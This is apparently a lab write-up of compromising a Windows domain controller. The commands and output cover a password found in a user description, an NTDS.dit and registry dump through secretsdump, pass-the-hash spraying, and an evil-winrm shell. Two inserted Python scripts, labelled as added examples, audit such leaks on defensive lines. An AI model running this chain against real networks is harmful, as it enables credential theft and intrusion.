Foothold

$ netexec smb 192.168.170.175 -u '' -p '' --users 
SMB         192.168.170.175 445    RESOURCEDC       [*] Windows 10 / Server 2019 Build 17763 x64 (name:RESOURCEDC) (domain:resourced.local) (signing:True) (SMBv1:False)
SMB         192.168.170.175 445    RESOURCEDC       [+] resourced.local\: 
SMB         192.168.170.175 445    RESOURCEDC       -Username-                    -Last PW Set-       -BadPW- -Description-                                               
SMB         192.168.170.175 445    RESOURCEDC       Administrator                 2022-02-11 17:21:20 0       Built-in account for administering the computer/domain 
SMB         192.168.170.175 445    RESOURCEDC       Guest                         <never>             0       Built-in account for guest access to the computer/domain 
SMB         192.168.170.175 445    RESOURCEDC       krbtgt                        2021-10-01 11:08:53 0       Key Distribution Center Service Account 
SMB         192.168.170.175 445    RESOURCEDC       M.Mason                       2021-10-01 11:14:51 0       Ex IT admin 
SMB         192.168.170.175 445    RESOURCEDC       K.Keen                        2021-10-01 11:14:51 0       Frontend Developer 
SMB         192.168.170.175 445    RESOURCEDC       L.Livingstone                 2021-10-01 11:14:51 0       SysAdmin 
SMB         192.168.170.175 445    RESOURCEDC       J.Johnson                     2021-10-01 11:14:52 0       Networking specialist 
SMB         192.168.170.175 445    RESOURCEDC       V.Ventz                       2021-10-01 11:14:52 0       New-hired, reminder: HotelCalifornia194! 
SMB         192.168.170.175 445    RESOURCEDC       S.Swanson                     2021-10-01 11:14:52 0       Military Vet now cybersecurity specialist 
SMB         192.168.170.175 445    RESOURCEDC       P.Parker                      2021-10-01 11:14:52 0       Backend Developer 
SMB         192.168.170.175 445    RESOURCEDC       R.Robinson                    2021-10-01 11:14:52 0       Database Admin 
SMB         192.168.170.175 445    RESOURCEDC       D.Durant                      2021-10-01 11:14:52 0       Linear Algebra and crypto god 
SMB         192.168.170.175 445    RESOURCEDC       G.Goldberg                    2021-10-01 11:14:52 0       Blockchain expert 
V.Ventz:HotelCalifornia194!
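The finding above (a password left in an account's description attribute) is the kind of thing an AD hygiene audit should catch before anonymous enumeration does. The following is an added example, not part of the writeup: it parses rows in the layout netexec's `--users` prints and flags descriptions that contain credential keywords or password-looking tokens. The rows, host, domain and users are constructed, not the machine's real output.

```python
import re

# Constructed rows in the column layout of `netexec smb ... --users` (padding collapsed);
# not the page's real output.
SAMPLE_USERS = """\
SMB  10.0.0.5  445  DC01  [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:corp.local)
SMB  10.0.0.5  445  DC01  [+] corp.local\\:
SMB  10.0.0.5  445  DC01  -Username-  -Last PW Set-  -BadPW-  -Description-
SMB  10.0.0.5  445  DC01  Guest  <never>  0  Built-in account for guest access to the computer/domain
SMB  10.0.0.5  445  DC01  M.Mason  2021-10-01 11:14:51  0  Ex IT admin
SMB  10.0.0.5  445  DC01  V.Ventz  2021-10-01 11:14:52  0  New-hired, reminder: Summer2021!
SMB  10.0.0.5  445  DC01  T.Temp  2021-10-01 11:14:52  0  Temporary contractor, pw is Welcome1
SMB  10.0.0.5  445  DC01  R.Robinson  2021-10-01 11:14:52  0  Database Admin
"""

# One user row: username, last-password-set (or <never>), bad-password count, free-text description.
ROW_RE = re.compile(
    r"^SMB\s+\S+\s+\d+\s+\S+\s+(?P<user>\S+)\s+"
    r"(?P<pwset><never>|\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\s+"
    r"(?P<badpw>\d+)\s*(?P<desc>.*?)\s*$")
# Words that usually accompany a credential left in a description field.
KEYWORDS = re.compile(r"\b(pass(word)?|pwd?|cred(ential)?s?|reminder|login)\b", re.I)

def looks_like_password(token):
    """Heuristic: 8+ chars, at least one digit, plus two of {lower, upper, symbol}."""
    token = token.strip(",;:()\"'")
    if len(token) < 8 or not any(c.isdigit() for c in token):
        return False
    classes = (any(c.islower() for c in token) + any(c.isupper() for c in token)
               + any(not c.isalnum() for c in token))
    return classes >= 2

def parse_users(text):
    """User rows as dicts; banner, header and status lines do not match ROW_RE."""
    return [m.groupdict() for m in map(ROW_RE.match, text.splitlines()) if m]

def find_description_leaks(text):
    """(user, description, reasons) for rows whose description looks like it carries a credential."""
    hits = []
    for row in parse_users(text):
        reasons = []
        if KEYWORDS.search(row["desc"]):
            reasons.append("keyword")
        tokens = [t for t in row["desc"].split() if looks_like_password(t)]
        if tokens:
            reasons.append("password-like token: " + ", ".join(tokens))
        if reasons:
            hits.append((row["user"], row["desc"], reasons))
    return hits
```

The same check runs unchanged over a real `--users` capture saved to a file, since the regex only depends on the column order.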
$ netexec smb 192.168.170.175 -u V.Ventz -p 'HotelCalifornia194!' --shares
SMB         192.168.170.175 445    RESOURCEDC       [*] Windows 10 / Server 2019 Build 17763 x64 (name:RESOURCEDC) (domain:resourced.local) (signing:True) (SMBv1:False)
SMB         192.168.170.175 445    RESOURCEDC       [+] resourced.local\V.Ventz:HotelCalifornia194! 
SMB         192.168.170.175 445    RESOURCEDC       [*] Enumerated shares
SMB         192.168.170.175 445    RESOURCEDC       Share           Permissions     Remark
SMB         192.168.170.175 445    RESOURCEDC       -----           -----------     ------
SMB         192.168.170.175 445    RESOURCEDC       ADMIN$                          Remote Admin
SMB         192.168.170.175 445    RESOURCEDC       C$                              Default share
SMB         192.168.170.175 445    RESOURCEDC       IPC$            READ            Remote IPC
SMB         192.168.170.175 445    RESOURCEDC       NETLOGON        READ            Logon server share 
SMB         192.168.170.175 445    RESOURCEDC       Password Audit  READ            
SMB         192.168.170.175 445    RESOURCEDC       SYSVOL          READ            Logon server share 
$ smbclient '\\192.168.170.175\Password Audit' -U V.Ventz%'HotelCalifornia194!'
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Oct  5 03:49:16 2021
  ..                                  D        0  Tue Oct  5 03:49:16 2021
  Active Directory                    D        0  Tue Oct  5 03:49:15 2021
  registry                            D        0  Tue Oct  5 03:49:16 2021

		7706623 blocks of size 4096. 2716813 blocks available
smb: \> recurse on
smb: \> prompt off
smb: \> mget *
getting file \Active Directory\ntds.dit of size 25165824 as Active Directory/ntds.dit (1707.3 KiloBytes/sec) (average 1707.3 KiloBytes/sec)
getting file \Active Directory\ntds.jfm of size 16384 as Active Directory/ntds.jfm (88.9 KiloBytes/sec) (average 1687.3 KiloBytes/sec)
getting file \registry\SECURITY of size 65536 as registry/SECURITY (355.6 KiloBytes/sec) (average 1671.0 KiloBytes/sec)
getting file \registry\SYSTEM of size 16777216 as registry/SYSTEM (3090.2 KiloBytes/sec) (average 2046.2 KiloBytes/sec)
smb: \> exit
$ cd Active\ Directory
$ mv ../registry/* .
$ impacket-secretsdump -ntds ntds.dit -system SYSTEM -just-dc-ntlm local
Impacket v0.12.0.dev1+20240807.21946.829239e - Copyright 2023 Fortra

[*] Target system bootKey: 0x6f961da31c7ffaf16683f78e04c3e03d
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 9298735ba0d788c4fc05528650553f94
[*] Reading and decrypting hashes from ntds.dit 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:12579b1666d4ac10f0f59f300776495f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
RESOURCEDC$:1000:aad3b435b51404eeaad3b435b51404ee:9ddb6f4d9d01fedeb4bccfb09df1b39d:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3004b16f88664fbebfcb9ed272b0565b:::
M.Mason:1103:aad3b435b51404eeaad3b435b51404ee:3105e0f6af52aba8e11d19f27e487e45:::
K.Keen:1104:aad3b435b51404eeaad3b435b51404ee:204410cc5a7147cd52a04ddae6754b0c:::
L.Livingstone:1105:aad3b435b51404eeaad3b435b51404ee:19a3a7550ce8c505c2d46b5e39d6f808:::
J.Johnson:1106:aad3b435b51404eeaad3b435b51404ee:3e028552b946cc4f282b72879f63b726:::
V.Ventz:1107:aad3b435b51404eeaad3b435b51404ee:913c144caea1c0a936fd1ccb46929d3c:::
S.Swanson:1108:aad3b435b51404eeaad3b435b51404ee:bd7c11a9021d2708eda561984f3c8939:::
P.Parker:1109:aad3b435b51404eeaad3b435b51404ee:980910b8fc2e4fe9d482123301dd19fe:::
R.Robinson:1110:aad3b435b51404eeaad3b435b51404ee:fea5a148c14cf51590456b2102b29fac:::
D.Durant:1111:aad3b435b51404eeaad3b435b51404ee:08aca8ed17a9eec9fac4acdcb4652c35:::
G.Goldberg:1112:aad3b435b51404eeaad3b435b51404ee:62e16d17c3015c47b4d513e65ca757a2:::
[*] Cleaning up... 
$ vi hashes.txt
$ cat hashes.txt | grep ::: | awk -F: '{print $1":"$4}'
Administrator:12579b1666d4ac10f0f59f300776495f
Guest:31d6cfe0d16ae931b73c59d7e0c089c0
RESOURCEDC$:9ddb6f4d9d01fedeb4bccfb09df1b39d
krbtgt:3004b16f88664fbebfcb9ed272b0565b
M.Mason:3105e0f6af52aba8e11d19f27e487e45
K.Keen:204410cc5a7147cd52a04ddae6754b0c
L.Livingstone:19a3a7550ce8c505c2d46b5e39d6f808
J.Johnson:3e028552b946cc4f282b72879f63b726
V.Ventz:913c144caea1c0a936fd1ccb46929d3c
S.Swanson:bd7c11a9021d2708eda561984f3c8939
P.Parker:980910b8fc2e4fe9d482123301dd19fe
R.Robinson:fea5a148c14cf51590456b2102b29fac
D.Durant:08aca8ed17a9eec9fac4acdcb4652c35
G.Goldberg:62e16d17c3015c47b4d513e65ca757a2
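The awk one-liner above reduces the secretsdump output to `user:nthash`. As an added example (not the writeup's own code), the script below does the same parse and goes a step further, with the checks a password audit of an NTDS dump normally makes: accounts whose NT hash is the empty-password hash, accounts that still store an LM hash, and one NT hash shared by several accounts. The dump lines, names and repeated-digit hashes are constructed; the empty-password LM and NT constants are the standard ones.

```python
import re
from collections import defaultdict

# Constructed lines in the secretsdump `-just-dc-ntlm` layout (domain\uid:rid:lmhash:nthash:::);
# the account names and 1111.../2222... hashes are made up, not the page's dump.
SAMPLE_DUMP = """\
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:22222222222222222222222222222222:::
a.alpha:1103:aad3b435b51404eeaad3b435b51404ee:33333333333333333333333333333333:::
b.bravo:1104:aad3b435b51404eeaad3b435b51404ee:33333333333333333333333333333333:::
c.charlie:1105:55555555555555555555555555555555:44444444444444444444444444444444:::
[*] Cleaning up...
"""

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM half when no LM hash is stored (the normal case)
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password
LINE_RE = re.compile(r"^([^:\s]+):(\d+):([0-9a-f]{32}):([0-9a-f]{32}):::$", re.I)

def parse_dump(text):
    """{account: (rid, lmhash, nthash)}; status lines ([*] ...) do not match LINE_RE."""
    accounts = {}
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            name, rid, lm, nt = m.groups()
            accounts[name] = (int(rid), lm.lower(), nt.lower())
    return accounts

def audit_dump(text):
    """Blank passwords, legacy LM hashes and NT hashes shared by several accounts."""
    by_nt = defaultdict(list)
    findings = {"blank_password": [], "lm_hash_stored": []}
    for name, (_rid, lm, nt) in parse_dump(text).items():
        if nt == EMPTY_NT:
            findings["blank_password"].append(name)
        if lm != EMPTY_LM:
            findings["lm_hash_stored"].append(name)
        by_nt[nt].append(name)
    findings["shared_password"] = {h: users for h, users in by_nt.items() if len(users) > 1}
    return findings

def hashcat_user_lines(text):
    """user:nthash lines for `hashcat --user -m 1000`, minus machine accounts and blank passwords."""
    return [f"{name}:{nt}" for name, (_rid, _lm, nt) in parse_dump(text).items()
            if not name.endswith("$") and nt != EMPTY_NT]
```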
$ hashcat --user -m 1000 old.ntlm ~/rockyou.txt -O

Didn't crack shit lol

$ cat old.ntlm | grep : | awk -F: '{print $2}' 
12579b1666d4ac10f0f59f300776495f
31d6cfe0d16ae931b73c59d7e0c089c0
9ddb6f4d9d01fedeb4bccfb09df1b39d
3004b16f88664fbebfcb9ed272b0565b
3105e0f6af52aba8e11d19f27e487e45
204410cc5a7147cd52a04ddae6754b0c
19a3a7550ce8c505c2d46b5e39d6f808
3e028552b946cc4f282b72879f63b726
913c144caea1c0a936fd1ccb46929d3c
bd7c11a9021d2708eda561984f3c8939
980910b8fc2e4fe9d482123301dd19fe
fea5a148c14cf51590456b2102b29fac
08aca8ed17a9eec9fac4acdcb4652c35
62e16d17c3015c47b4d513e65ca757a2
$ netexec smb 192.168.170.175 -u users -H pth.ntlm --continue-on-success | grep "+"
L.Livingstone:19a3a7550ce8c505c2d46b5e39d6f808
$ netexec rdp 192.168.170.175 -u L.Livingstone -H 19a3a7550ce8c505c2d46b5e39d6f808
RDP         192.168.170.175 3389   RESOURCEDC       [*] Windows 10 or Windows Server 2016 Build 17763 (name:RESOURCEDC) (domain:resourced.local) (nla:True)
RDP         192.168.170.175 3389   RESOURCEDC       [+] resourced.local\L.Livingstone:19a3a7550ce8c505c2d46b5e39d6f808 (Pwn3d!)

$ netexec winrm 192.168.170.175 -u L.Livingstone -H 19a3a7550ce8c505c2d46b5e39d6f808
WINRM       192.168.170.175 5985   RESOURCEDC       [*] Windows 10 / Server 2019 Build 17763 (name:RESOURCEDC) (domain:resourced.local)
WINRM       192.168.170.175 5985   RESOURCEDC       [+] resourced.local\L.Livingstone:19a3a7550ce8c505c2d46b5e39d6f808 (Pwn3d!)
$ evil-winrm -u L.Livingstone -H 19a3a7550ce8c505c2d46b5e39d6f808 -i 192.168.170.175
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\L.Livingstone\Documents> whoami; type C:\Users\L.Livingstone\Desktop\local.txt; ipconfig
resourced\l.livingstone
ff1cad90deba0636ad33387726786a5f

Windows IP Configuration


Ethernet adapter Ethernet0 2:

   Connection-specific DNS Suffix  . :
   IPv4 Address. . . . . . . . . . . : 192.168.170.175
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.170.254
